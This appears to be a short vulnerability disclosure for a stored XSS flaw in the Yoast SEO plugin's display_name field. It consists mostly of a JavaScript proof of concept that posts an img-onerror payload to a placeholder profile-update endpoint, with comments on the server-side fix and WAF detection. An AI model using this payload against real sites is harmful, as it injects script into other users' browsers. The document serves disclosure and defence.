Created
May 19, 2024 09:15
The Yoast SEO plugin is vulnerable to stored XSS due to insufficient sanitization and escaping of the display_name field in class-metabox-formatter.php.
<script>
// Proof-of-concept for the stored XSS described above. The value is plain HTML:
// an <img> element whose onerror handler runs script. It only becomes a problem
// when the receiving code stores display_name without sanitizing it and later
// writes it into a page without HTML escaping.
var maliciousPayload = "<img src=x onerror=alert('XSS Attack!') />";
// Submits the value through the display_name field of a profile-update request.
// The fix belongs on the server side: sanitize the field on input and escape it
// for the HTML context on output (here, in class-metabox-formatter.php).
// Detection: profile-update requests whose display_name contains tags or
// on*= event-handler attributes are a useful signal for a WAF or log alert.
var xhr = new XMLHttpRequest();
xhr.open("POST", "/update_profile", true); // "/update_profile" is a placeholder path; the real route is not shown on this page
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onreadystatechange = function() {
  // Only the final ready state is inspected; intermediate states are ignored.
  if (xhr.readyState === XMLHttpRequest.DONE) {
    if (xhr.status === 200) {
      console.log("Profile updated successfully!");
    } else {
      console.error("Error updating profile:", xhr.statusText);
    }
  }
};
var profileData = {
  display_name: maliciousPayload
  // Other profile fields the endpoint may require are not shown here.
};
xhr.send(JSON.stringify(profileData));
</script>